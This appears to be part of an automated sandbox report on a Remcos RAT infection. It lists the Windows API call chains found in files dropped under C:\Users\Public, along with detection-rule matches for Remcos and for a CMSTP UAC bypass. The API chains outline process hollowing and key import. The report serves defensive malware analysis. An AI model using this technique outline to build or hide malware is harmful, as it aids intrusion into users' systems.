                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF093A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DED342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DED0EF4 NCryptImportKey,#205,#359,#359,#357
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF06EA8 NCryptImportKey,#360
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DEC0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DEBEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE929A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF0A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE925E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DECE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject

                    System Summary

                    Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Process Stats: CPU usage > 49%
                    Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken
                    Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
                    Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BD898C NtQueryInformationToken
                    Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                    Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                    Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                    Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
                    Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
                    Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken
                    Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
                    Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF789BD898C NtQueryInformationToken
                    Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                    Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                    Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                    Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
                    Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
                    Source: C:\Users\Public\ger.exe | Code function: 14_2_00007FF655889890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF2C964 NtQuerySystemTime,RtlTimeToSecondsSince1970
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028AC2D8 NtCreateFile,NtWriteFile
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028AC3BC NtOpenFile,NtReadFile,NtClose
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A78E0 NtAllocateVirtualMemory
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028AC2D6 NtCreateFile,NtWriteFile
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A78DE NtAllocateVirtualMemory
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA0BB35 OpenProcess,NtResumeProcess,CloseHandle
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA0BB09 OpenProcess,NtSuspendProcess,CloseHandle
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA032D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA0D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
                    Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                    Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError
                    Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken
                    Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
                    Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD898C NtQueryInformationToken
                    Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                    Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                    Source: C:\Users\Public\alpha.exe | Code function: 29_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_029BC3BC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_029B78E0 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_029BC2D8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_029BC2D6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_029B7A38 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_029B78DE GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_029B7EBE CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_029B7EC0 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_210732D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_2107BB09 OpenProcess,NtSuspendProcess,CloseHandle
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_2107BB35 OpenProcess,NtResumeProcess,CloseHandle
                    Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BC5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z
                    Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF789BD4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA067B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_210767B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC7D306_2_00007FF789BC7D30
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BF15386_2_00007FF789BF1538
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BCB0D86_2_00007FF789BCB0D8
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC85106_2_00007FF789BC8510
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD18D46_2_00007FF789BD18D4
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC18846_2_00007FF789BC1884
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD78546_2_00007FF789BD7854
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC2C486_2_00007FF789BC2C48
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BEAC4C6_2_00007FF789BEAC4C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC6BE06_2_00007FF789BC6BE0
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC34106_2_00007FF789BC3410
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BEAFBC6_2_00007FF789BEAFBC
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC5B706_2_00007FF789BC5B70
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC3F906_2_00007FF789BC3F90
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC372C6_2_00007FF789BC372C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC9B506_2_00007FF789BC9B50
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588605414_2_00007FF655886054
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588596C14_2_00007FF65588596C
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588166414_2_00007FF655881664
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655886EC814_2_00007FF655886EC8
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF6558872C014_2_00007FF6558872C0
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655886AE814_2_00007FF655886AE8
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF6558883D814_2_00007FF6558883D8
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588512814_2_00007FF655885128
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588431814_2_00007FF655884318
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588405014_2_00007FF655884050
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655889C7414_2_00007FF655889C74
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588767014_2_00007FF655887670
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655882D7014_2_00007FF655882D70
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF65588989014_2_00007FF655889890
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF655887C7C14_2_00007FF655887C7C
                    Source: C:\Users\Public\ger.exeCode function: 14_2_00007FF6558867A014_2_00007FF6558867A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1C12025_2_00007FF67DF1C120
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1BC1025_2_00007FF67DF1BC10
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF4380025_2_00007FF67DF43800
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1F02025_2_00007FF67DF1F020
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE42F3825_2_00007FF67DE42F38
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1CCB825_2_00007FF67DF1CCB8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC5F0425_2_00007FF67DEC5F04
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB9EE425_2_00007FF67DEB9EE4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE81ED025_2_00007FF67DE81ED0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBDEB025_2_00007FF67DEBDEB0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8DEA425_2_00007FF67DE8DEA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBBE7025_2_00007FF67DEBBE70
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC1E2C25_2_00007FF67DEC1E2C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE65DF725_2_00007FF67DE65DF7
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE41DE825_2_00007FF67DE41DE8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECBDA025_2_00007FF67DECBDA0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE91D7025_2_00007FF67DE91D70
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE7D7025_2_00007FF67DEE7D70
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE89D6C25_2_00007FF67DE89D6C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3DD8425_2_00007FF67DF3DD84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9C0B825_2_00007FF67DE9C0B8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0208425_2_00007FF67DF02084
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6808025_2_00007FF67DE68080
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9801825_2_00007FF67DE98018
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE9FF825_2_00007FF67DEE9FF8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE31F8025_2_00007FF67DE31F80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFBB2825_2_00007FF67DEFBB28
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE97AC825_2_00007FF67DE97AC8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE47AB425_2_00007FF67DE47AB4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE9A5825_2_00007FF67DEE9A58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE81A6025_2_00007FF67DE81A60
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEABA4825_2_00007FF67DEABA48
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE63A4025_2_00007FF67DE63A40
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE31A1025_2_00007FF67DE31A10
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3FC9025_2_00007FF67DF3FC90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5F9B825_2_00007FF67DE5F9B8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB19AC25_2_00007FF67DEB19AC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBF99025_2_00007FF67DEBF990
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2793825_2_00007FF67DF27938
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2994C25_2_00007FF67DF2994C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6DD2025_2_00007FF67DE6DD20
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE45D0825_2_00007FF67DE45D08
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8BCE825_2_00007FF67DE8BCE8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE69CD025_2_00007FF67DE69CD0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF9CC025_2_00007FF67DEF9CC0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4BCA425_2_00007FF67DE4BCA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB1C9025_2_00007FF67DEB1C90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE83C6025_2_00007FF67DE83C60
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8FC3425_2_00007FF67DE8FC34
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6FC2025_2_00007FF67DE6FC20
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE3C1025_2_00007FF67DEE3C10
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9DBF025_2_00007FF67DE9DBF0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE59BC825_2_00007FF67DE59BC8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE35BA425_2_00007FF67DE35BA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA1B8425_2_00007FF67DEA1B84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3FB8425_2_00007FF67DE3FB84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC7B7425_2_00007FF67DEC7B74
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDFB5025_2_00007FF67DEDFB50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBF6D825_2_00007FF67DEBF6D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE876B025_2_00007FF67DE876B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEED6A025_2_00007FF67DEED6A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE767825_2_00007FF67DEE7678
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0566025_2_00007FF67DF05660
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5D66025_2_00007FF67DE5D660
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7564825_2_00007FF67DE75648
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3F61025_2_00007FF67DE3F610
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB95FC25_2_00007FF67DEB95FC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE955F025_2_00007FF67DE955F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6B58C25_2_00007FF67DE6B58C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6156C25_2_00007FF67DE6156C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0958025_2_00007FF67DF09580
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE858CC25_2_00007FF67DE858CC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9789025_2_00007FF67DE97890
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0387425_2_00007FF67DF03874
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECD85825_2_00007FF67DECD858
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC184C25_2_00007FF67DEC184C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1363825_2_00007FF67DF13638
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5183025_2_00007FF67DE51830
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE382025_2_00007FF67DEE3820
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4F80025_2_00007FF67DE4F800
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1767825_2_00007FF67DF17678
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9D7F025_2_00007FF67DE9D7F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE717D425_2_00007FF67DE717D4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA77C825_2_00007FF67DEA77C8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8979025_2_00007FF67DE89790
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4B78825_2_00007FF67DE4B788
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0D6DC25_2_00007FF67DF0D6DC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB376025_2_00007FF67DEB3760
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC531825_2_00007FF67DEC5318
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA92D825_2_00007FF67DEA92D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8D2C025_2_00007FF67DE8D2C0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1B3AC25_2_00007FF67DF1B3AC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE992C425_2_00007FF67DE992C4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3F2C025_2_00007FF67DE3F2C0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF233D025_2_00007FF67DF233D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF333D425_2_00007FF67DF333D4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE529025_2_00007FF67DEE5290
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE831E025_2_00007FF67DE831E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE811C825_2_00007FF67DE811C8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF294A825_2_00007FF67DF294A8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4D1B825_2_00007FF67DE4D1B8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBF16825_2_00007FF67DEBF168
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAF52025_2_00007FF67DEAF520
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF014F025_2_00007FF67DF014F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE554A025_2_00007FF67DE554A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE949425_2_00007FF67DEE9494
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9747825_2_00007FF67DE97478
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDD46025_2_00007FF67DEDD460
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE3543825_2_00007FF67DE35438
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7D44025_2_00007FF67DE7D440
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7F43425_2_00007FF67DE7F434
